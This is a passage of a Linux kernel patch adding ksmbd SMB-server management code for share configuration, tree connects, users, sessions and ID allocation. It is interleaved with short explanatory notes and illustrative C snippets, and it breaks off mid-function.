++ * @work: smb work containing request buffer
++ */
++static inline void *ksmbd_req_buf_next(struct ksmbd_work *work)
++{
++	return work->request_buf + work->next_smb2_rcv_hdr_off + 4;
++}
++
++struct ksmbd_work *ksmbd_alloc_work_struct(void);
++void ksmbd_free_work_struct(struct ksmbd_work *work);
++
++void ksmbd_work_pool_destroy(void);
++int ksmbd_work_pool_init(void);
++
++int ksmbd_workqueue_init(void);
++void ksmbd_workqueue_destroy(void);
++bool ksmbd_queue_work(struct ksmbd_work *work);
++
++#endif /* __KSMBD_WORK_H__ */
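Both inline helpers above add 4 to the stored header offset; the 4 bytes skipped appear to be the transport length prefix (RFC 1002 style) that precedes the first SMB2 header in these buffers, so hdr_off + 4 lands on a command header. A sketch under that assumption, for the first command of a compound request:

static void *hypothetical_first_hdr(struct ksmbd_work *work)
{
	work->next_smb2_rcv_hdr_off = 0;	/* first command: offset 0 */
	return ksmbd_req_buf_next(work);	/* request_buf + 0 + 4 */
}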
+diff --git a/fs/smb/server/mgmt/ksmbd_ida.c b/fs/smb/server/mgmt/ksmbd_ida.c
+new file mode 100644
+index 0000000000000..54194d959a5ef
+--- /dev/null
++++ b/fs/smb/server/mgmt/ksmbd_ida.c
+@@ -0,0 +1,46 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include "ksmbd_ida.h"
++
++static inline int __acquire_id(struct ida *ida, int from, int to)
++{
++	return ida_simple_get(ida, from, to, GFP_KERNEL);
++}
++
++int ksmbd_acquire_smb2_tid(struct ida *ida)
++{
++	int id;
++
++	id = __acquire_id(ida, 1, 0xFFFFFFFF);
++
++	return id;
++}
++
++int ksmbd_acquire_smb2_uid(struct ida *ida)
++{
++	int id;
++
++	id = __acquire_id(ida, 1, 0);
++	if (id == 0xFFFE)
++		id = __acquire_id(ida, 1, 0);
++
++	return id;
++}
++
++int ksmbd_acquire_async_msg_id(struct ida *ida)
++{
++	return __acquire_id(ida, 1, 0);
++}
++
++int ksmbd_acquire_id(struct ida *ida)
++{
++	return __acquire_id(ida, 0, 0);
++}
++
++void ksmbd_release_id(struct ida *ida, int id)
++{
++	ida_simple_remove(ida, id);
++}
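For readers unfamiliar with the IDA API used above: ida_simple_get(ida, start, end, gfp) returns the smallest free ID in [start, end), with end == 0 meaning no upper bound. So __acquire_id(ida, 1, 0) can never hand out 0, and the UID helper's retry on 0xFFFE simply leaves that one ID allocated, effectively reserving the value the matching header comment warns about. A hypothetical caller:

static DEFINE_IDA(example_ida);		/* invented IDA instance */

static int example_take_uid(void)
{
	int id = ksmbd_acquire_smb2_uid(&example_ida);

	if (id < 0)
		return id;	/* -ENOMEM/-ENOSPC from ida_simple_get() */
	return id;		/* never 0, never 0xFFFE */
}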
+diff --git a/fs/smb/server/mgmt/ksmbd_ida.h b/fs/smb/server/mgmt/ksmbd_ida.h
+new file mode 100644
+index 0000000000000..2bc07b16cfde9
+--- /dev/null
++++ b/fs/smb/server/mgmt/ksmbd_ida.h
+@@ -0,0 +1,34 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __KSMBD_IDA_MANAGEMENT_H__
++#define __KSMBD_IDA_MANAGEMENT_H__
++
++#include <linux/slab.h>
++#include <linux/idr.h>
++
++/*
++ * 2.2.1.6.7 TID Generation
++ *    The value 0xFFFF MUST NOT be used as a valid TID. All other
++ *    possible values for TID, including zero (0x0000), are valid.
++ *    The value 0xFFFF is used to specify all TIDs or no TID,
++ *    depending upon the context in which it is used.
++ */
++int ksmbd_acquire_smb2_tid(struct ida *ida);
++
++/*
++ * 2.2.1.6.8 UID Generation
++ *    The value 0xFFFE was declared reserved in the LAN Manager 1.0
++ *    documentation, so a value of 0xFFFE SHOULD NOT be used as a
++ *    valid UID.<21> All other possible values for a UID, excluding
++ *    zero (0x0000), are valid.
++ */
++int ksmbd_acquire_smb2_uid(struct ida *ida);
++int ksmbd_acquire_async_msg_id(struct ida *ida);
++
++int ksmbd_acquire_id(struct ida *ida);
++
++void ksmbd_release_id(struct ida *ida, int id);
++#endif /* __KSMBD_IDA_MANAGEMENT_H__ */
+diff --git a/fs/smb/server/mgmt/share_config.c b/fs/smb/server/mgmt/share_config.c
+new file mode 100644
+index 0000000000000..328a412259dc1
+--- /dev/null
++++ b/fs/smb/server/mgmt/share_config.c
+@@ -0,0 +1,234 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/list.h>
++#include <linux/jhash.h>
++#include <linux/slab.h>
++#include <linux/rwsem.h>
++#include <linux/parser.h>
++#include <linux/namei.h>
++#include <linux/sched.h>
++#include <linux/mm.h>
++
++#include "share_config.h"
++#include "user_config.h"
++#include "user_session.h"
++#include "../transport_ipc.h"
++#include "../misc.h"
++
++#define SHARE_HASH_BITS		3
++static DEFINE_HASHTABLE(shares_table, SHARE_HASH_BITS);
++static DECLARE_RWSEM(shares_table_lock);
++
++struct ksmbd_veto_pattern {
++	char			*pattern;
++	struct list_head	list;
++};
++
++static unsigned int share_name_hash(const char *name)
++{
++	return jhash(name, strlen(name), 0);
++}
++
++static void kill_share(struct ksmbd_share_config *share)
++{
++	while (!list_empty(&share->veto_list)) {
++		struct ksmbd_veto_pattern *p;
++
++		p = list_entry(share->veto_list.next,
++			       struct ksmbd_veto_pattern,
++			       list);
++		list_del(&p->list);
++		kfree(p->pattern);
++		kfree(p);
++	}
++
++	if (share->path)
++		path_put(&share->vfs_path);
++	kfree(share->name);
++	kfree(share->path);
++	kfree(share);
++}
++
++void ksmbd_share_config_del(struct ksmbd_share_config *share)
++{
++	down_write(&shares_table_lock);
++	hash_del(&share->hlist);
++	up_write(&shares_table_lock);
++}
++
++void __ksmbd_share_config_put(struct ksmbd_share_config *share)
++{
++	ksmbd_share_config_del(share);
++	kill_share(share);
++}
++
++static struct ksmbd_share_config *
++__get_share_config(struct ksmbd_share_config *share)
++{
++	if (!atomic_inc_not_zero(&share->refcount))
++		return NULL;
++	return share;
++}
++
++static struct ksmbd_share_config *__share_lookup(const char *name)
++{
++	struct ksmbd_share_config *share;
++	unsigned int key = share_name_hash(name);
++
++	hash_for_each_possible(shares_table, share, hlist, key) {
++		if (!strcmp(name, share->name))
++			return share;
++	}
++	return NULL;
++}
++
++static int parse_veto_list(struct ksmbd_share_config *share,
++			   char *veto_list,
++			   int veto_list_sz)
++{
++	int sz = 0;
++
++	if (!veto_list_sz)
++		return 0;
++
++	while (veto_list_sz > 0) {
++		struct ksmbd_veto_pattern *p;
++
++		sz = strlen(veto_list);
++		if (!sz)
++			break;
++
++		p = kzalloc(sizeof(struct ksmbd_veto_pattern), GFP_KERNEL);
++		if (!p)
++			return -ENOMEM;
++
++		p->pattern = kstrdup(veto_list, GFP_KERNEL);
++		if (!p->pattern) {
++			kfree(p);
++			return -ENOMEM;
++		}
++
++		list_add(&p->list, &share->veto_list);
++
++		veto_list += sz + 1;
++		veto_list_sz -= (sz + 1);
++	}
++
++	return 0;
++}
++
++static struct ksmbd_share_config *share_config_request(struct unicode_map *um,
++						       const char *name)
++{
++	struct ksmbd_share_config_response *resp;
++	struct ksmbd_share_config *share = NULL;
++	struct ksmbd_share_config *lookup;
++	int ret;
++
++	resp = ksmbd_ipc_share_config_request(name);
++	if (!resp)
++		return NULL;
++
++	if (resp->flags == KSMBD_SHARE_FLAG_INVALID)
++		goto out;
++
++	if (*resp->share_name) {
++		char *cf_resp_name;
++		bool equal;
++
++		cf_resp_name = ksmbd_casefold_sharename(um, resp->share_name);
++		if (IS_ERR(cf_resp_name))
++			goto out;
++		equal = !strcmp(cf_resp_name, name);
++		kfree(cf_resp_name);
++		if (!equal)
++			goto out;
++	}
++
++	share = kzalloc(sizeof(struct ksmbd_share_config), GFP_KERNEL);
++	if (!share)
++		goto out;
++
++	share->flags = resp->flags;
++	atomic_set(&share->refcount, 1);
++	INIT_LIST_HEAD(&share->veto_list);
++	share->name = kstrdup(name, GFP_KERNEL);
++
++	if (!test_share_config_flag(share, KSMBD_SHARE_FLAG_PIPE)) {
++		share->path = kstrdup(ksmbd_share_config_path(resp),
++				      GFP_KERNEL);
++		if (share->path)
++			share->path_sz = strlen(share->path);
++		share->create_mask = resp->create_mask;
++		share->directory_mask = resp->directory_mask;
++		share->force_create_mode = resp->force_create_mode;
++		share->force_directory_mode = resp->force_directory_mode;
++		share->force_uid = resp->force_uid;
++		share->force_gid = resp->force_gid;
++		ret = parse_veto_list(share,
++				      KSMBD_SHARE_CONFIG_VETO_LIST(resp),
++				      resp->veto_list_sz);
++		if (!ret && share->path) {
++			ret = kern_path(share->path, 0, &share->vfs_path);
++			if (ret) {
++				ksmbd_debug(SMB, "failed to access '%s'\n",
++					    share->path);
++				/* Avoid path_put() */
++				kfree(share->path);
++				share->path = NULL;
++			}
++		}
++		if (ret || !share->name) {
++			kill_share(share);
++			share = NULL;
++			goto out;
++		}
++	}
++
++	down_write(&shares_table_lock);
++	lookup = __share_lookup(name);
++	if (lookup)
++		lookup = __get_share_config(lookup);
++	if (!lookup) {
++		hash_add(shares_table, &share->hlist, share_name_hash(name));
++	} else {
++		kill_share(share);
++		share = lookup;
++	}
++	up_write(&shares_table_lock);
++
++out:
++	kvfree(resp);
++	return share;
++}
++
++struct ksmbd_share_config *ksmbd_share_config_get(struct unicode_map *um,
++						  const char *name)
++{
++	struct ksmbd_share_config *share;
++
++	down_read(&shares_table_lock);
++	share = __share_lookup(name);
++	if (share)
++		share = __get_share_config(share);
++	up_read(&shares_table_lock);
++
++	if (share)
++		return share;
++	return share_config_request(um, name);
++}
++
++bool ksmbd_share_veto_filename(struct ksmbd_share_config *share,
++			       const char *filename)
++{
++	struct ksmbd_veto_pattern *p;
++
++	list_for_each_entry(p, &share->veto_list, list) {
++		if (match_wildcard(p->pattern, filename))
++			return true;
++	}
++	return false;
++}
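It may help to see the ____payload layout that parse_veto_list() and ksmbd_share_config_path() both walk: veto patterns are NUL-separated, veto_list_sz covers the patterns plus their terminators, and, judging by the "+ 1" in ksmbd_share_config_path(), one extra NUL separates the list from the share path. An illustrative layout with invented patterns and path:

/* Illustrative only; two veto patterns, then the path. */
static const char payload[] =
	"*.tmp\0"	/* veto pattern 1 (6 bytes with NUL) */
	"secret*\0"	/* veto pattern 2 (8 bytes with NUL) */
	"\0"		/* extra terminator: path starts at veto_list_sz + 1 */
	"/srv/share";	/* returned by ksmbd_share_config_path() */
/* here veto_list_sz == 14: (5 + 1) + (7 + 1), matching parse_veto_list() */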
+diff --git a/fs/smb/server/mgmt/share_config.h b/fs/smb/server/mgmt/share_config.h
+new file mode 100644
+index 0000000000000..3fd3382939421
+--- /dev/null
++++ b/fs/smb/server/mgmt/share_config.h
+@@ -0,0 +1,82 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __SHARE_CONFIG_MANAGEMENT_H__
++#define __SHARE_CONFIG_MANAGEMENT_H__
++
++#include <linux/workqueue.h>
++#include <linux/hashtable.h>
++#include <linux/path.h>
++#include <linux/unicode.h>
++
++struct ksmbd_share_config {
++	char			*name;
++	char			*path;
++
++	unsigned int		path_sz;
++	unsigned int		flags;
++	struct list_head	veto_list;
++
++	struct path		vfs_path;
++
++	atomic_t		refcount;
++	struct hlist_node	hlist;
++	unsigned short		create_mask;
++	unsigned short		directory_mask;
++	unsigned short		force_create_mode;
++	unsigned short		force_directory_mode;
++	unsigned short		force_uid;
++	unsigned short		force_gid;
++};
++
++#define KSMBD_SHARE_INVALID_UID	((__u16)-1)
++#define KSMBD_SHARE_INVALID_GID	((__u16)-1)
++
++static inline int share_config_create_mode(struct ksmbd_share_config *share,
++					   umode_t posix_mode)
++{
++	if (!share->force_create_mode) {
++		if (!posix_mode)
++			return share->create_mask;
++		else
++			return posix_mode & share->create_mask;
++	}
++	return share->force_create_mode & share->create_mask;
++}
++
++static inline int share_config_directory_mode(struct ksmbd_share_config *share,
++					      umode_t posix_mode)
++{
++	if (!share->force_directory_mode) {
++		if (!posix_mode)
++			return share->directory_mask;
++		else
++			return posix_mode & share->directory_mask;
++	}
++
++	return share->force_directory_mode & share->directory_mask;
++}
++
++static inline int test_share_config_flag(struct ksmbd_share_config *share,
++					 int flag)
++{
++	return share->flags & flag;
++}
++
++void ksmbd_share_config_del(struct ksmbd_share_config *share);
++void __ksmbd_share_config_put(struct ksmbd_share_config *share);
++
++static inline void ksmbd_share_config_put(struct ksmbd_share_config *share)
++{
++	if (!atomic_dec_and_test(&share->refcount))
++		return;
++	__ksmbd_share_config_put(share);
++}
++
++struct ksmbd_share_config *ksmbd_share_config_get(struct unicode_map *um,
++						  const char *name);
++bool ksmbd_share_veto_filename(struct ksmbd_share_config *share,
++			       const char *filename);
++#endif /* __SHARE_CONFIG_MANAGEMENT_H__ */
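A quick worked example for share_config_create_mode() above, with invented masks: when no force mode is set, the client's POSIX mode is ANDed with the mask, and a client that sends no mode gets the mask itself; a force mode overrides the client entirely.

static void example_modes(void)
{
	struct ksmbd_share_config ex = { .create_mask = 0744 };

	share_config_create_mode(&ex, 0666);	/* 0666 & 0744 = 0644 */
	share_config_create_mode(&ex, 0);	/* no mode: mask  = 0744 */
	ex.force_create_mode = 0600;
	share_config_create_mode(&ex, 0666);	/* 0600 & 0744 = 0600 */
}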
+diff --git a/fs/smb/server/mgmt/tree_connect.c b/fs/smb/server/mgmt/tree_connect.c
+new file mode 100644
+index 0000000000000..f07a05f376513
+--- /dev/null
++++ b/fs/smb/server/mgmt/tree_connect.c
+@@ -0,0 +1,147 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/list.h>
++#include <linux/slab.h>
++#include <linux/xarray.h>
++
++#include "../transport_ipc.h"
++#include "../connection.h"
++
++#include "tree_connect.h"
++#include "user_config.h"
++#include "share_config.h"
++#include "user_session.h"
++
++struct ksmbd_tree_conn_status
++ksmbd_tree_conn_connect(struct ksmbd_conn *conn, struct ksmbd_session *sess,
++			const char *share_name)
++{
++	struct ksmbd_tree_conn_status status = {-ENOENT, NULL};
++	struct ksmbd_tree_connect_response *resp = NULL;
++	struct ksmbd_share_config *sc;
++	struct ksmbd_tree_connect *tree_conn = NULL;
++	struct sockaddr *peer_addr;
++	int ret;
++
++	sc = ksmbd_share_config_get(conn->um, share_name);
++	if (!sc)
++		return status;
++
++	tree_conn = kzalloc(sizeof(struct ksmbd_tree_connect), GFP_KERNEL);
++	if (!tree_conn) {
++		status.ret = -ENOMEM;
++		goto out_error;
++	}
++
++	tree_conn->id = ksmbd_acquire_tree_conn_id(sess);
++	if (tree_conn->id < 0) {
++		status.ret = -EINVAL;
++		goto out_error;
++	}
++
++	peer_addr = KSMBD_TCP_PEER_SOCKADDR(conn);
++	resp = ksmbd_ipc_tree_connect_request(sess,
++					      sc,
++					      tree_conn,
++					      peer_addr);
++	if (!resp) {
++		status.ret = -EINVAL;
++		goto out_error;
++	}
++
++	status.ret = resp->status;
++	if (status.ret != KSMBD_TREE_CONN_STATUS_OK)
++		goto out_error;
++
++	tree_conn->flags = resp->connection_flags;
++	if (test_tree_conn_flag(tree_conn, KSMBD_TREE_CONN_FLAG_UPDATE)) {
++		struct ksmbd_share_config *new_sc;
++
++		ksmbd_share_config_del(sc);
++		new_sc = ksmbd_share_config_get(conn->um, share_name);
++		if (!new_sc) {
++			pr_err("Failed to update stale share config\n");
++			status.ret = -ESTALE;
++			goto out_error;
++		}
++		ksmbd_share_config_put(sc);
++		sc = new_sc;
++	}
++
++	tree_conn->user = sess->user;
++	tree_conn->share_conf = sc;
++	status.tree_conn = tree_conn;
++
++	ret = xa_err(xa_store(&sess->tree_conns, tree_conn->id, tree_conn,
++			      GFP_KERNEL));
++	if (ret) {
++		status.ret = -ENOMEM;
++		goto out_error;
++	}
++	kvfree(resp);
++	return status;
++
++out_error:
++	if (tree_conn)
++		ksmbd_release_tree_conn_id(sess, tree_conn->id);
++	ksmbd_share_config_put(sc);
++	kfree(tree_conn);
++	kvfree(resp);
++	return status;
++}
++
++int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
++			       struct ksmbd_tree_connect *tree_conn)
++{
++	int ret;
++
++	ret = ksmbd_ipc_tree_disconnect_request(sess->id, tree_conn->id);
++	ksmbd_release_tree_conn_id(sess, tree_conn->id);
++	xa_erase(&sess->tree_conns, tree_conn->id);
++	ksmbd_share_config_put(tree_conn->share_conf);
++	kfree(tree_conn);
++	return ret;
++}
++
++struct ksmbd_tree_connect *ksmbd_tree_conn_lookup(struct ksmbd_session *sess,
++						  unsigned int id)
++{
++	struct ksmbd_tree_connect *tcon;
++
++	tcon = xa_load(&sess->tree_conns, id);
++	if (tcon) {
++		if (test_bit(TREE_CONN_EXPIRE, &tcon->status))
++			tcon = NULL;
++	}
++
++	return tcon;
++}
++
++struct ksmbd_share_config *ksmbd_tree_conn_share(struct ksmbd_session *sess,
++						 unsigned int id)
++{
++	struct ksmbd_tree_connect *tc;
++
++	tc = ksmbd_tree_conn_lookup(sess, id);
++	if (tc)
++		return tc->share_conf;
++	return NULL;
++}
++
++int ksmbd_tree_conn_session_logoff(struct ksmbd_session *sess)
++{
++	int ret = 0;
++	struct ksmbd_tree_connect *tc;
++	unsigned long id;
++
++	if (!sess)
++		return -EINVAL;
++
++	xa_for_each(&sess->tree_conns, id, tc)
++		ret |= ksmbd_tree_conn_disconnect(sess, tc);
++	xa_destroy(&sess->tree_conns);
++	return ret;
++}
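ksmbd_tree_conn_connect() above reports both a status code and the new connection through one small struct, so a caller must check .ret before touching .tree_conn. A hypothetical call site (share name and error mapping invented):

static int hypothetical_tcon(struct ksmbd_conn *conn, struct ksmbd_session *sess)
{
	struct ksmbd_tree_conn_status status;

	status = ksmbd_tree_conn_connect(conn, sess, "public");
	if (status.ret != KSMBD_TREE_CONN_STATUS_OK)
		return -EACCES;	/* error mapping is the caller's choice */
	/* status.tree_conn is live and indexed in sess->tree_conns */
	return status.tree_conn->id;
}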
+diff --git a/fs/smb/server/mgmt/tree_connect.h b/fs/smb/server/mgmt/tree_connect.h
+new file mode 100644
+index 0000000000000..700df36cf3e30
+--- /dev/null
++++ b/fs/smb/server/mgmt/tree_connect.h
+@@ -0,0 +1,61 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __TREE_CONNECT_MANAGEMENT_H__
++#define __TREE_CONNECT_MANAGEMENT_H__
++
++#include <linux/hashtable.h>
++
++#include "../ksmbd_netlink.h"
++
++struct ksmbd_share_config;
++struct ksmbd_user;
++struct ksmbd_conn;
++
++#define TREE_CONN_EXPIRE		1
++
++struct ksmbd_tree_connect {
++	int				id;
++
++	unsigned int			flags;
++	struct ksmbd_share_config	*share_conf;
++	struct ksmbd_user		*user;
++
++	struct list_head		list;
++
++	int				maximal_access;
++	bool				posix_extensions;
++	unsigned long			status;
++};
++
++struct ksmbd_tree_conn_status {
++	unsigned int			ret;
++	struct ksmbd_tree_connect	*tree_conn;
++};
++
++static inline int test_tree_conn_flag(struct ksmbd_tree_connect *tree_conn,
++				      int flag)
++{
++	return tree_conn->flags & flag;
++}
++
++struct ksmbd_session;
++
++struct ksmbd_tree_conn_status
++ksmbd_tree_conn_connect(struct ksmbd_conn *conn, struct ksmbd_session *sess,
++			const char *share_name);
++
++int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
++			       struct ksmbd_tree_connect *tree_conn);
++
++struct ksmbd_tree_connect *ksmbd_tree_conn_lookup(struct ksmbd_session *sess,
++						  unsigned int id);
++
++struct ksmbd_share_config *ksmbd_tree_conn_share(struct ksmbd_session *sess,
++						 unsigned int id);
++
++int ksmbd_tree_conn_session_logoff(struct ksmbd_session *sess);
++
++#endif /* __TREE_CONNECT_MANAGEMENT_H__ */
+diff --git a/fs/smb/server/mgmt/user_config.c b/fs/smb/server/mgmt/user_config.c
+new file mode 100644
+index 0000000000000..279d00feff216
+--- /dev/null
++++ b/fs/smb/server/mgmt/user_config.c
+@@ -0,0 +1,79 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/slab.h>
++#include <linux/mm.h>
++
++#include "user_config.h"
++#include "../transport_ipc.h"
++
++struct ksmbd_user *ksmbd_login_user(const char *account)
++{
++	struct ksmbd_login_response *resp;
++	struct ksmbd_user *user = NULL;
++
++	resp = ksmbd_ipc_login_request(account);
++	if (!resp)
++		return NULL;
++
++	if (!(resp->status & KSMBD_USER_FLAG_OK))
++		goto out;
++
++	user = ksmbd_alloc_user(resp);
++out:
++	kvfree(resp);
++	return user;
++}
++
++struct ksmbd_user *ksmbd_alloc_user(struct ksmbd_login_response *resp)
++{
++	struct ksmbd_user *user = NULL;
++
++	user = kmalloc(sizeof(struct ksmbd_user), GFP_KERNEL);
++	if (!user)
++		return NULL;
++
++	user->name = kstrdup(resp->account, GFP_KERNEL);
++	user->flags = resp->status;
++	user->gid = resp->gid;
++	user->uid = resp->uid;
++	user->passkey_sz = resp->hash_sz;
++	user->passkey = kmalloc(resp->hash_sz, GFP_KERNEL);
++	if (user->passkey)
++		memcpy(user->passkey, resp->hash, resp->hash_sz);
++
++	if (!user->name || !user->passkey) {
++		kfree(user->name);
++		kfree(user->passkey);
++		kfree(user);
++		user = NULL;
++	}
++	return user;
++}
++
++void ksmbd_free_user(struct ksmbd_user *user)
++{
++	ksmbd_ipc_logout_request(user->name, user->flags);
++	kfree(user->name);
++	kfree(user->passkey);
++	kfree(user);
++}
++
++int ksmbd_anonymous_user(struct ksmbd_user *user)
++{
++	if (user->name[0] == '\0')
++		return 1;
++	return 0;
++}
++
++bool ksmbd_compare_user(struct ksmbd_user *u1, struct ksmbd_user *u2)
++{
++	if (strcmp(u1->name, u2->name))
++		return false;
++	if (memcmp(u1->passkey, u2->passkey, u1->passkey_sz))
++		return false;
++
++	return true;
++}
+diff --git a/fs/smb/server/mgmt/user_config.h b/fs/smb/server/mgmt/user_config.h
+new file mode 100644
+index 0000000000000..6a44109617f14
+--- /dev/null
++++ b/fs/smb/server/mgmt/user_config.h
+@@ -0,0 +1,68 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __USER_CONFIG_MANAGEMENT_H__
++#define __USER_CONFIG_MANAGEMENT_H__
++
++#include "../glob.h"
++
++struct ksmbd_user {
++	unsigned short		flags;
++
++	unsigned int		uid;
++	unsigned int		gid;
++
++	char			*name;
++
++	size_t			passkey_sz;
++	char			*passkey;
++	unsigned int		failed_login_count;
++};
++
++static inline bool user_guest(struct ksmbd_user *user)
++{
++	return user->flags & KSMBD_USER_FLAG_GUEST_ACCOUNT;
++}
++
++static inline void set_user_flag(struct ksmbd_user *user, int flag)
++{
++	user->flags |= flag;
++}
++
++static inline int test_user_flag(struct ksmbd_user *user, int flag)
++{
++	return user->flags & flag;
++}
++
++static inline void set_user_guest(struct ksmbd_user *user)
++{
++}
++
++static inline char *user_passkey(struct ksmbd_user *user)
++{
++	return user->passkey;
++}
++
++static inline char *user_name(struct ksmbd_user *user)
++{
++	return user->name;
++}
++
++static inline unsigned int user_uid(struct ksmbd_user *user)
++{
++	return user->uid;
++}
++
++static inline unsigned int user_gid(struct ksmbd_user *user)
++{
++	return user->gid;
++}
++
++struct ksmbd_user *ksmbd_login_user(const char *account);
++struct ksmbd_user *ksmbd_alloc_user(struct ksmbd_login_response *resp);
++void ksmbd_free_user(struct ksmbd_user *user);
++int ksmbd_anonymous_user(struct ksmbd_user *user);
++bool ksmbd_compare_user(struct ksmbd_user *u1, struct ksmbd_user *u2);
++#endif /* __USER_CONFIG_MANAGEMENT_H__ */
+diff --git a/fs/smb/server/mgmt/user_session.c b/fs/smb/server/mgmt/user_session.c
+new file mode 100644
+index 0000000000000..ea4b56d570fbb
+--- /dev/null
++++ b/fs/smb/server/mgmt/user_session.c
+@@ -0,0 +1,400 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/list.h>
++#include <linux/slab.h>
++#include <linux/rwsem.h>
++#include <linux/xarray.h>
++
++#include "ksmbd_ida.h"
++#include "user_session.h"
++#include "user_config.h"
++#include "tree_connect.h"
++#include "../transport_ipc.h"
++#include "../connection.h"
++#include "../vfs_cache.h"
++
++static DEFINE_IDA(session_ida);
++
++#define SESSION_HASH_BITS		3
++static DEFINE_HASHTABLE(sessions_table, SESSION_HASH_BITS);
++static DECLARE_RWSEM(sessions_table_lock);
++
++struct ksmbd_session_rpc {
++	int			id;
++	unsigned int		method;
++	struct list_head	list;
++};
++
++static void free_channel_list(struct ksmbd_session *sess)
++{
++	struct channel *chann;
++	unsigned long index;
++
++	xa_for_each(&sess->ksmbd_chann_list, index, chann) {
++		xa_erase(&sess->ksmbd_chann_list, index);
++		kfree(chann);
++	}
++
++	xa_destroy(&sess->ksmbd_chann_list);
++}
++
++static void __session_rpc_close(struct ksmbd_session *sess,
++				struct ksmbd_session_rpc *entry)
++{
++	struct ksmbd_rpc_command *resp;
++
++	resp = ksmbd_rpc_close(sess, entry->id);
++	if (!resp)
++		pr_err("Unable to close RPC pipe %d\n", entry->id);
++
++	kvfree(resp);
++	ksmbd_rpc_id_free(entry->id);
++	kfree(entry);
++}
++
++static void ksmbd_session_rpc_clear_list(struct ksmbd_session *sess)
++{
++	struct ksmbd_session_rpc *entry;
++
++	while (!list_empty(&sess->rpc_handle_list)) {
++		entry = list_entry(sess->rpc_handle_list.next,
++				   struct ksmbd_session_rpc,
++				   list);
++
++		list_del(&entry->list);
++		__session_rpc_close(sess, entry);
++	}
++}
++
++static int __rpc_method(char *rpc_name)
++{
++	if (!strcmp(rpc_name, "\\srvsvc") || !strcmp(rpc_name, "srvsvc"))
++		return KSMBD_RPC_SRVSVC_METHOD_INVOKE;
++
++	if (!strcmp(rpc_name, "\\wkssvc") || !strcmp(rpc_name, "wkssvc"))
++		return KSMBD_RPC_WKSSVC_METHOD_INVOKE;
++
++	if (!strcmp(rpc_name, "LANMAN") || !strcmp(rpc_name, "lanman"))
++		return KSMBD_RPC_RAP_METHOD;
++
++	if (!strcmp(rpc_name, "\\samr") || !strcmp(rpc_name, "samr"))
++		return KSMBD_RPC_SAMR_METHOD_INVOKE;
++
++	if (!strcmp(rpc_name, "\\lsarpc") || !strcmp(rpc_name, "lsarpc"))
++		return KSMBD_RPC_LSARPC_METHOD_INVOKE;
++
++	pr_err("Unsupported RPC: %s\n", rpc_name);
++	return 0;
++}
++
++int ksmbd_session_rpc_open(struct ksmbd_session *sess, char *rpc_name)
++{
++	struct ksmbd_session_rpc *entry;
++	struct ksmbd_rpc_command *resp;
++	int method;
++
++	method = __rpc_method(rpc_name);
++	if (!method)
++		return -EINVAL;
++
++	entry = kzalloc(sizeof(struct ksmbd_session_rpc), GFP_KERNEL);
++	if (!entry)
++		return -EINVAL;
++
++	list_add(&entry->list, &sess->rpc_handle_list);
++	entry->method = method;
++	entry->id = ksmbd_ipc_id_alloc();
++	if (entry->id < 0)
++		goto free_entry;
++
++	resp = ksmbd_rpc_open(sess, entry->id);
++	if (!resp)
++		goto free_id;
++
++	kvfree(resp);
++	return entry->id;
++free_id:
++	ksmbd_rpc_id_free(entry->id);
++free_entry:
++	list_del(&entry->list);
++	kfree(entry);
++	return -EINVAL;
++}
++
++void ksmbd_session_rpc_close(struct ksmbd_session *sess, int id)
++{
++	struct ksmbd_session_rpc *entry;
++
++	list_for_each_entry(entry, &sess->rpc_handle_list, list) {
++		if (entry->id == id) {
++			list_del(&entry->list);
++			__session_rpc_close(sess, entry);
++			break;
++		}
++	}
++}
++
++int ksmbd_session_rpc_method(struct ksmbd_session *sess, int id)
++{
++	struct ksmbd_session_rpc *entry;
++
++	list_for_each_entry(entry, &sess->rpc_handle_list, list) {
++		if (entry->id == id)
++			return entry->method;
++	}
++	return 0;
++}
++
++void ksmbd_session_destroy(struct ksmbd_session *sess)
++{
++	if (!sess)
++		return;
++
++	if (sess->user)
++		ksmbd_free_user(sess->user);
++
++	ksmbd_tree_conn_session_logoff(sess);
++	ksmbd_destroy_file_table(&sess->file_table);
++	ksmbd_session_rpc_clear_list(sess);
++	free_channel_list(sess);
++	kfree(sess->Preauth_HashValue);
++	ksmbd_release_id(&session_ida, sess->id);
++	kfree(sess);
++}
++
++static struct ksmbd_session *__session_lookup(unsigned long long id)
++{
++	struct ksmbd_session *sess;
++
++	hash_for_each_possible(sessions_table, sess, hlist, id) {
++		if (id == sess->id) {
++			sess->last_active = jiffies;
++			return sess;
++		}
++	}
++	return NULL;
++}
++
++static void ksmbd_expire_session(struct ksmbd_conn *conn)
++{
++	unsigned long id;
++	struct ksmbd_session *sess;
++
++	down_write(&sessions_table_lock);
++	xa_for_each(&conn->sessions, id, sess) {
++		if (sess->state != SMB2_SESSION_VALID ||
++		    time_after(jiffies,
++			       sess->last_active + SMB2_SESSION_TIMEOUT)) {
++			xa_erase(&conn->sessions, sess->id);
++			hash_del(&sess->hlist);
++			ksmbd_session_destroy(sess);
++			continue;
++		}
++	}
++	up_write(&sessions_table_lock);
++}
++
++int ksmbd_session_register(struct ksmbd_conn *conn,
++			   struct ksmbd_session *sess)
++{
++	sess->dialect = conn->dialect;
